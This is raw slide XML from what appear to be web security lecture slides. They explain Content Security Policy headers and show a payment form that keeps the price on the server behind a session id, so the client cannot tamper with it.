              <a:rPr sz="1626" spc="15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>providers, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="18" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="-125" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="18" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>allow</a:t>
            </a:r>
            <a:endParaRPr sz="1626">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="195697" indent="-131842" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1946"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="196015" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1626" spc="33" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="23" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="-23" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="28" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specific </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="-3" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="28" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="28" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="-65" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code.</a:t>
            </a:r>
            <a:endParaRPr sz="1626">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA7C230-0B7D-3847-8438-C5FE557FB88E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="4019550"/>
            <a:ext cx="8175625" cy="550863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4F0F5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1944"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2051" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Content-Security-Policy: default-src 'self'; img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2051" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2051" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>*;</a:t>
            </a:r>
            <a:endParaRPr sz="2051">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2446"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2051" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>media-src media1.com; script-src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2051" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2051" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userscripts.example.com</a:t>
            </a:r>
            <a:endParaRPr sz="2051">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs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4359673-EC74-E744-9438-DCBA05432044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1106124" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="100" dirty="0"/>
              <a:t>capabilities</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC8759BF-3CB6-EC47-9C54-030D2F02FD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827213" y="4498975"/>
            <a:ext cx="6164262" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="8873" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="26622" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="70"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“price”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value=“5.50”&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B85FFB44-1C45-D445-8D9D-4EBE3460DE42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1827213" y="4498975"/>
            <a:ext cx="6164262" cy="314325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6163945"/>
              <a:gd name="T1" fmla="*/ 0 h 314325"/>
              <a:gd name="T2" fmla="*/ 6171020 w 6163945"/>
              <a:gd name="T3" fmla="*/ 0 h 314325"/>
              <a:gd name="T4" fmla="*/ 6171020 w 6163945"/>
              <a:gd name="T5" fmla="*/ 314324 h 314325"/>
              <a:gd name="T6" fmla="*/ 0 w 6163945"/>
              <a:gd name="T7" fmla="*/ 314324 h 314325"/>
              <a:gd name="T8" fmla="*/ 0 w 6163945"/>
              <a:gd name="T9" fmla="*/ 0 h 314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63945" h="314325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6163729" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6163729" y="314324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3143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1749" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E559748-9979-0B44-A383-732BC00804DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1820863" y="2960688"/>
            <a:ext cx="7780337" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="982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8381" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="2698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ts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;form action=“submit_order” method=“GET”&gt;  The total cost is $5.50. Confirm order?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“hidden” name=“sid” value=“781234”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“submit” name=“pay” value=“yes”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=“submit” name=“pay” value=“no”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32CFCB26-24F9-B541-B091-C880808257B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336800" y="2019300"/>
            <a:ext cx="5387975" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can no </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>longer change</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>price</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs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D266700-199A-FA48-BA52-641758EBD22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1244600"/>
            <a:ext cx="6249988" cy="831850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-535" dirty="0"/>
              <a:t>Content </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-458" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-861" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-530" dirty="0"/>
              <a:t>Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180227" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200B577E-573E-EA47-B68B-36F9235F92D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="2463800"/>
            <a:ext cx="831056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50272" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="4572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spcBef>
                <a:spcPts val="1188"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Administrator serves Content Security Policy via:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1138"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy: default-src 'self'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1650"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Meta HTML Object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2313"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="813"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
